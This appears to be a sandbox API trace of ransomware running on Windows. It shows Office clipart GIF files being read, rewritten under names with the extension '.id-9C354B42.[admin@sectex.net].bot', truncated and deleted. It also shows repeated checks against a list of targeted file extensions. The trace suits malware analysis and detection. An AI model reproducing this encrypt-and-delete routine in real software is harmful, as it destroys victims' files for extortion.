	[0153.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.894] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099194.gif")) returned 1
	[0153.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.895] lstrlenW (lpString=".doc") returned 4
	[0153.895] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0153.895] lstrlenW (lpString=".docx") returned 5
	[0153.895] lstrcmpiW (lpString1=".docx", lpString2="4.GIF") returned -1
	[0153.895] lstrlenW (lpString=".pdf") returned 4
	[0153.895] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0153.895] lstrlenW (lpString=".xls") returned 4
	[0153.895] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0153.895] lstrlenW (lpString=".xlsx") returned 5
	[0153.895] lstrcmpiW (lpString1=".xlsx", lpString2="4.GIF") returned -1
	[0153.895] lstrlenW (lpString=".ppt") returned 4
	[0153.895] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0153.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.895] lstrlenW (lpString=".zip") returned 4
	[0153.895] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0153.895] lstrlenW (lpString=".rar") returned 4
	[0153.895] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0153.895] lstrlenW (lpString=".bz2") returned 4
	[0153.895] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0153.895] lstrlenW (lpString=".7z") returned 3
	[0153.895] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0153.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.895] lstrlenW (lpString=".dbf") returned 4
	[0153.896] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0153.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.896] lstrlenW (lpString=".1cd") returned 4
	[0153.896] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0153.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.896] lstrlenW (lpString=".jpg") returned 4
	[0153.896] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0153.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.896] lstrlenW (lpString=".doc") returned 4
	[0153.896] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0153.896] lstrlenW (lpString=".docx") returned 5
	[0153.896] lstrcmpiW (lpString1=".docx", lpString2="4.GIF") returned -1
	[0153.896] lstrlenW (lpString=".pdf") returned 4
	[0153.896] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0153.896] lstrlenW (lpString=".xls") returned 4
	[0153.896] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0153.896] lstrlenW (lpString=".xlsx") returned 5
	[0153.896] lstrcmpiW (lpString1=".xlsx", lpString2="4.GIF") returned -1
	[0153.896] lstrlenW (lpString=".ppt") returned 4
	[0153.896] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0153.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.896] lstrlenW (lpString=".zip") returned 4
	[0153.896] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0153.896] lstrlenW (lpString=".rar") returned 4
	[0153.896] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0153.896] lstrlenW (lpString=".bz2") returned 4
	[0153.896] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0153.896] lstrlenW (lpString=".7z") returned 3
	[0153.896] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0153.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.897] lstrlenW (lpString=".dbf") returned 4
	[0153.897] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0153.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.897] lstrlenW (lpString=".1cd") returned 4
	[0153.897] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0153.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF") returned 63
	[0153.897] lstrlenW (lpString=".jpg") returned 4
	[0153.897] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0153.897] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0153.897] lstrlenW (lpString="J0099195.GIF") returned 12
	[0153.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.898] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=19923) returned 1
	[0153.898] CloseHandle (hObject=0x3b4) returned 1
	[0153.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif")) returned 0x20
	[0153.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.898] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.898] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0153.899] GetLastError () returned 0x0
	[0153.899] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4dd3, lpOverlapped=0x0) returned 1
	[0154.209] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4de0, lpOverlapped=0x0) returned 1
	[0154.210] ReadFile (in: hFile=0x3b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.210] WriteFile (in: hFile=0x3a0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.211] SetEndOfFile (hFile=0x3a0) returned 1
	[0154.211] CloseHandle (hObject=0x3a0) returned 1
	[0154.211] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.211] SetEndOfFile (hFile=0x3b4) returned 1
	[0154.213] CloseHandle (hObject=0x3b4) returned 1
	[0154.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif")) returned 1
	[0154.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.227] lstrlenW (lpString=".doc") returned 4
	[0154.227] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.227] lstrlenW (lpString=".docx") returned 5
	[0154.227] lstrcmpiW (lpString1=".docx", lpString2="5.GIF") returned -1
	[0154.227] lstrlenW (lpString=".pdf") returned 4
	[0154.227] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.227] lstrlenW (lpString=".xls") returned 4
	[0154.227] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.227] lstrlenW (lpString=".xlsx") returned 5
	[0154.227] lstrcmpiW (lpString1=".xlsx", lpString2="5.GIF") returned -1
	[0154.227] lstrlenW (lpString=".ppt") returned 4
	[0154.228] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.228] lstrlenW (lpString=".zip") returned 4
	[0154.228] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.228] lstrlenW (lpString=".rar") returned 4
	[0154.228] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.228] lstrlenW (lpString=".bz2") returned 4
	[0154.228] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.228] lstrlenW (lpString=".7z") returned 3
	[0154.228] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.228] lstrlenW (lpString=".dbf") returned 4
	[0154.228] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.228] lstrlenW (lpString=".1cd") returned 4
	[0154.228] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.228] lstrlenW (lpString=".jpg") returned 4
	[0154.228] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.228] lstrlenW (lpString=".doc") returned 4
	[0154.228] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.228] lstrlenW (lpString=".docx") returned 5
	[0154.228] lstrcmpiW (lpString1=".docx", lpString2="5.GIF") returned -1
	[0154.228] lstrlenW (lpString=".pdf") returned 4
	[0154.228] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.228] lstrlenW (lpString=".xls") returned 4
	[0154.228] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.228] lstrlenW (lpString=".xlsx") returned 5
	[0154.228] lstrcmpiW (lpString1=".xlsx", lpString2="5.GIF") returned -1
	[0154.229] lstrlenW (lpString=".ppt") returned 4
	[0154.229] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.229] lstrlenW (lpString=".zip") returned 4
	[0154.229] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.229] lstrlenW (lpString=".rar") returned 4
	[0154.229] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.229] lstrlenW (lpString=".bz2") returned 4
	[0154.229] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.229] lstrlenW (lpString=".7z") returned 3
	[0154.229] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.229] lstrlenW (lpString=".dbf") returned 4
	[0154.229] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.229] lstrlenW (lpString=".1cd") returned 4
	[0154.229] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned 63
	[0154.229] lstrlenW (lpString=".jpg") returned 4
	[0154.229] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.229] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0154.230] lstrlenW (lpString="J0099198.GIF") returned 12
	[0154.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0154.231] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5259) returned 1
	[0154.231] CloseHandle (hObject=0x268) returned 1
	[0154.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif")) returned 0x20
	[0154.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0154.231] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.231] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0154.232] GetLastError () returned 0x0
	[0154.232] ReadFile (in: hFile=0x268, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x148b, lpOverlapped=0x0) returned 1
	[0154.288] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1490, lpOverlapped=0x0) returned 1
	[0154.289] ReadFile (in: hFile=0x268, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.289] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.289] SetEndOfFile (hFile=0x3d0) returned 1
	[0154.290] CloseHandle (hObject=0x3d0) returned 1
	[0154.290] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.290] SetEndOfFile (hFile=0x268) returned 1
	[0154.292] CloseHandle (hObject=0x268) returned 1
	[0154.292] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.292] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099198.gif")) returned 1
	[0154.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.293] lstrlenW (lpString=".doc") returned 4
	[0154.293] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.293] lstrlenW (lpString=".docx") returned 5
	[0154.293] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1
	[0154.293] lstrlenW (lpString=".pdf") returned 4
	[0154.293] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.293] lstrlenW (lpString=".xls") returned 4
	[0154.293] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.293] lstrlenW (lpString=".xlsx") returned 5
	[0154.293] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1
	[0154.293] lstrlenW (lpString=".ppt") returned 4
	[0154.293] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.293] lstrlenW (lpString=".zip") returned 4
	[0154.293] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.293] lstrlenW (lpString=".rar") returned 4
	[0154.293] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.293] lstrlenW (lpString=".bz2") returned 4
	[0154.293] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.293] lstrlenW (lpString=".7z") returned 3
	[0154.294] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.294] lstrlenW (lpString=".dbf") returned 4
	[0154.294] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.294] lstrlenW (lpString=".1cd") returned 4
	[0154.294] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.294] lstrlenW (lpString=".jpg") returned 4
	[0154.294] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.294] lstrlenW (lpString=".doc") returned 4
	[0154.294] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.294] lstrlenW (lpString=".docx") returned 5
	[0154.294] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1
	[0154.294] lstrlenW (lpString=".pdf") returned 4
	[0154.294] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.294] lstrlenW (lpString=".xls") returned 4
	[0154.294] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.294] lstrlenW (lpString=".xlsx") returned 5
	[0154.294] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1
	[0154.294] lstrlenW (lpString=".ppt") returned 4
	[0154.294] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.294] lstrlenW (lpString=".zip") returned 4
	[0154.294] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.294] lstrlenW (lpString=".rar") returned 4
	[0154.294] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.294] lstrlenW (lpString=".bz2") returned 4
	[0154.294] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.295] lstrlenW (lpString=".7z") returned 3
	[0154.295] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.295] lstrlenW (lpString=".dbf") returned 4
	[0154.295] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.295] lstrlenW (lpString=".1cd") returned 4
	[0154.295] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099198.GIF") returned 63
	[0154.295] lstrlenW (lpString=".jpg") returned 4
	[0154.295] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.295] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0154.295] lstrlenW (lpString="J0099200.GIF") returned 12
	[0154.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0154.313] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=16543) returned 1
	[0154.313] CloseHandle (hObject=0x31c) returned 1
	[0154.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif")) returned 0x20
	[0154.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0154.343] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.343] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0154.343] GetLastError () returned 0x0
	[0154.343] ReadFile (in: hFile=0x268, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x409f, lpOverlapped=0x0) returned 1
	[0154.375] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x40a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x40a0, lpOverlapped=0x0) returned 1
	[0154.376] ReadFile (in: hFile=0x268, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.377] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.377] SetEndOfFile (hFile=0x3d0) returned 1
	[0154.377] CloseHandle (hObject=0x3d0) returned 1
	[0154.377] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.377] SetEndOfFile (hFile=0x268) returned 1
	[0154.379] CloseHandle (hObject=0x268) returned 1
	[0154.379] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.379] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099200.gif")) returned 1
	[0154.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099200.GIF") returned 63
